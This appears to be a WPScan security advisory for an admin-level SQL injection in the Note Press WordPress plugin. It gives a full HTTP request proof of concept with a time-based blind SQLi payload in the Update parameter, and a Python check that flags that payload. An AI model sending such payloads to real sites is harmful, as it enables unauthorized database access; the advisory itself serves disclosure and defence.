wpvulndb | Daniel Krohmer | WPVDB-ID:982F84A1-216D-41ED-87BD-433B695CEC28
May 09, 2022 - 12:00 a.m.

Note Press <= 0.1.10 - Admin+ SQLi via Update

2022-05-09 00:00:00
Daniel Krohmer
wpscan.com

EPSS: 0.001 (Low), percentile 21.8%

The plugin does not sanitise and escape the Update parameter before using it in a SQL statement when updating a note via the admin dashboard, leading to an SQL injection.

PoC

POST /wp-admin/admin.php?page=Note_Press-Main-Menu&action=edit&id=17 HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wp-admin/admin.php?page=Note_Press-Main-Menu&action=edit&id=17
Content-Type: application/x-www-form-urlencoded
Content-Length: 186
Origin: http://localhost
DNT: 1
Connection: close
Cookie: [admin+]
Upgrade-Insecure-Requests: 1

_wpnonce=f5b4b02f56&Title=Test&stickycolor=&Deadline=&Priority=0&iconselect%5B%5D=aablank.png&display_name=admin&Note_Presseditor=&Update=17+AND+(SELECT+3630+FROM+(SELECT(SLEEP(5)))KdTt)
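
A defensive check for the request shape above, added here as an example and not taken from the plugin or from WPScan: it decodes the form body and flags any Update value that is not a plain numeric id. It assumes Update is meant to carry the note id (it equals id=17 in the request above); check_request, NUMERIC_ID and the shortened sample bodies are constructed for the illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

PLUGIN_PAGE = "Note_Press-Main-Menu"     # "page" value from the advisory's request
NUMERIC_ID = re.compile(r"[0-9]{1,10}")  # assumption: Update carries a note id

# Request target from the advisory; the bodies are shortened, constructed samples.
TARGET = "/wp-admin/admin.php?page=Note_Press-Main-Menu&action=edit&id=17"
BENIGN_BODY = "_wpnonce=f5b4b02f56&Title=Test&Priority=0&Update=17"
# Same form carrying the Update value shown in the advisory's PoC.
POC_BODY = ("_wpnonce=f5b4b02f56&Title=Test&Priority=0"
            "&Update=17+AND+(SELECT+3630+FROM+(SELECT(SLEEP(5)))KdTt)")


def check_request(target, body):
    """Return [("Update", decoded_value), ...] for non-numeric Update values.

    target: request target (path and query string) from the request line.
    body:   raw application/x-www-form-urlencoded POST body.
    Requests that do not address the plugin's admin page are ignored.
    """
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    if PLUGIN_PAGE not in query.get("page", []):
        return []
    # parse_qs URL-decodes values ("+" becomes a space) and keeps repeated
    # parameters, so every copy of Update is validated, not only the first.
    form = parse_qs(body, keep_blank_values=True)
    return [("Update", value) for value in form.get("Update", [])
            if not NUMERIC_ID.fullmatch(value)]


if __name__ == "__main__":
    for label, body in (("benign", BENIGN_BODY), ("advisory PoC", POC_BODY)):
        print(label, "->", check_request(TARGET, body))
```

The same strict integer validation belongs server-side before the value reaches the SQL statement; a log or proxy check like this one only detects the malformed parameter.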

CPE Name     Operator   Version
note-press   eq         *
